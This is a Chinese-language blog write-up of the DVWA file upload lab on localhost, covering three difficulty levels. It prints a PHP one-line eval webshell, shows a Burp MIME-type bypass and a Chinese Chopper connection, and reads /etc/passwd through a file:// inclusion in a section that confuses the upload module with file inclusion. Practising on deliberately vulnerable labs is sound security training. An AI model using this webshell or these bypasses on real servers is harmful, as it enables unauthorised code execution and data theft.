DVWA 之文件上傳漏洞

Low

沒有進行任何過濾
在這裏插入圖片描述
首相,上傳一個phpinfo.php,其內代碼如下:

<?php phpinfo(); ?>

上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然後訪問
在這裏插入圖片描述
首先,寫好

說明存在上傳和執行漏洞

上傳一句話木馬:

<?php @eval($_POST[“hack”]); ?>

保存爲hack.php
然後上傳
在這裏插入圖片描述
找到文件上傳目錄

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar這個插件,上傳命令,爆出信息
在這裏插入圖片描述
使用菜刀連接
在這裏插入圖片描述
在這裏插入圖片描述
成功

Medium

有過濾
在這裏插入圖片描述
使用str_replace函數是極其不安全的,因爲可以使用雙寫繞過替換規則。
同時,因爲替換的只是“…/”、“…\”,所以對採用絕對路徑的方式包含文件是不會受到任何限制的。
可以先在上傳一個
此題要求,需要上傳 .png或 .jpeg格式文件
因此,我們想到可以更改文件類型,然後上傳
直接hack.php擴展名改爲hack.png,然後上傳,
在這裏插入圖片描述
可以上傳成功,
使用菜刀連接
在這裏插入圖片描述
連接不上
製作圖片碼上傳,同樣如此
那麼,可以使用burp抓包修改文件類型看看
在這裏插入圖片描述在這裏插入圖片描述
成功

High

其過濾內容爲
在這裏插入圖片描述
這個if語句的意思是如果page中不含有file並且page不等於include.php服務器纔不會去包含相應的文件。兩個條件只要不滿足其中之一就可以,要麼page等於include.php,要麼page含有file。用file://流訪問本地文件系統

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
在這裏插入圖片描述
說明存在命令執行
上菜刀,結果發現無聊是如何,jar版本的死活連不上,使用windows .exe版本的可以,我也懵逼
在這裏插入圖片描述
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章